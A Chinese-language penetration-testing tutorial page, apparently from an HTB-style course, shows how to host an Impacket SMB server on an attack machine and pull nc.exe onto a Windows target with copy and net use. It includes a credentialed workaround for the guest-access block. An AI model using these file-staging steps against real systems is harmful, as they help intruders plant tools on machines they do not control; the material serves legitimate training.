SMB 下载方法

运行于 TCP/445 端口的服务器消息块协议（SMB 协议）在运行 Windows 服务的企业网络中很常见。它使应用程序和用户能够在远程服务器之间传输文件。

我们可以使用 SMB 从 Pwnbox 轻松下载文件。我们需要使用 Impacket 中的 smbserver.py 在 Attack Machine 中创建一个 SMB 服务器，然后使用copy、move、PowerShell Copy-Item 或任何其他允许连接到 SMB 的工具。

创建 SMB 服务器

AcesMin@htb[/htb]$ sudo impacket-smbserver share -smb2support /tmp/smbshare

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

要将文件从 SMB 服务器下载到当前工作目录，我们可以使用以下命令：

从 SMB 服务器复制文件

C:\htb> copy \\192.168.220.133\share\nc.exe

        1 file(s) copied.

新版本的 Windows 会阻止未经身份验证的来宾访问，如以下命令所示：

C:\htb> copy \\192.168.220.133\share\nc.exe

You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.

要在这种情况下传输文件，我们可以使用 Impacket SMB 服务器设置用户名和密码，并将 SMB 服务器安装在 Windows 目标计算机上：

使用用户名和密码创建 SMB 服务器

AcesMin@htb[/htb]$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

使用用户名和密码挂载 SMB 服务器

C:\htb> net use n: \\192.168.220.133\share /user:test test

The command completed successfully.

C:\htb> copy n:\nc.exe
        1 file(s) copied.

注意：如果在使用 copy filename \\IPIP\sharename 时出现错误，也可以挂载 SMB 服务器。

上一页PowerShell DownloadString - 无文件方法下一页FTP 下载方法

最后更新于1年前

这有帮助吗？